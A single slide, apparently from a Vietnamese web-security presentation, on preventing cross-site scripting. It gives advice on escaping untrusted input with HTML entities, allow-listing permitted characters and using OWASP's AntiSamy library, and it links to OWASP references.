  • 16. • “Escape” tất cả những dữ liệu không đáng tin cậy một cách hợp lý khi dữ liệu được đưa vào • Ví dụ: • Tham khảo thêm về HTML escaping: • Lập danh sách những dữ liệu được phép nhập vào • Ví dụ: Chỉ được nhập chữ cái, không được nhập ký tự đặc biệt • Với những dữ liệu như hình ảnh, video, có thể dùng những thư viện kiểm tra tự động như AntiSamy (OWASP) & --> &amp; < --> &lt; > --> &gt; https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet Tham khảo thêm về dự án AntiSamy: https://www.owasp.org/index.php/AntiSamy Cách phòng chống